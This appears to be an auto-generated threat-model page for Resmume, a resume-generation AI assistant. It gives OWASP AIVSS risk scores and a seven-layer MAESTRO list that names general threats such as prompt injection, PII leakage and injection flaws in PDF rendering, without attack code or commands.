Resmume — agentic threat model
Resmume is a low-risk, single-purpose AI assistant focused on resume generation and refinement. Its primary security concerns are data privacy (PII handling) and potential vulnerabilities in its PDF generation pipeline, rather than agentic or autonomous threats.
OWASP AIVSS score rationale
| Autonomy of Action | 0.10 | |
| Goal-Driven Planning | 0.10 | |
| Self-Modification | 0.00 | |
| Dynamic Tool Use | 0.10 | |
| Persistent Memory | 0.10 | |
| Contextual Awareness | 0.20 | |
| Dynamic Identity | 0.00 | |
| Multi-Agent Interactions | 0.00 | |
| Non-Determinism | 0.30 | |
| Opacity & Reflexivity | 0.20 |
Scored with the canonical OWASP AIVSS formula (AIVSS calculator reference); agentic risk factors estimated from the agent’s described capabilities.
MAESTRO 7-layer threat model
Per-layer threats for this agent. Layers tagged “not certain from listing” are general, caveated commentary where the public description didn’t pin that layer.
Not certain from the listing — likely uses a standard commercial LLM for text refinement. Threats include prompt injection to bypass tone refinement or generate inappropriate content, and potential data leakage if the upstream model trains on user resumes.
Not certain from the listing — likely processes user-uploaded resume text in real-time without a persistent vector database. The main threat is temporary storage leakage or data exfiltration of sensitive PII contained in resumes.
Not certain from the listing — likely a simple LLM wrapper rather than a complex agent framework. Threats include insecure integration with the PDF generation tool (e.g., HTML injection leading to SSRF or local file read during PDF rendering).
Not certain from the listing — hosted web application. Threats include standard web vulnerabilities (XSS, CSRF) and insecure PDF generation libraries that could be exploited via malicious resume inputs.
Not certain from the listing — no mention of guardrails or monitoring. Threats include lack of input validation on resume content, allowing users to generate spam or malicious text.
Not certain from the listing — mentions 'no sign-up processes' which implies lack of authentication/authorization controls. This poses compliance risks regarding GDPR/CCPA for handling resume PII without robust user consent or access controls.
Not certain from the listing — does not interact with other agents or marketplaces. Ecosystem threats are negligible.
MAESTRO — the 7-layer agentic threat-modeling framework (Cloud Security Alliance / Ken Huang).
These scores are auto-generated from public information (the agent's own listing, docs, and repository) using the canonical OWASP AIVSS formula and the MAESTRO framework — an estimate for guidance, not a penetration test, audit, or certification. See the scoring methodology. Are you the vendor? Factual corrections are free.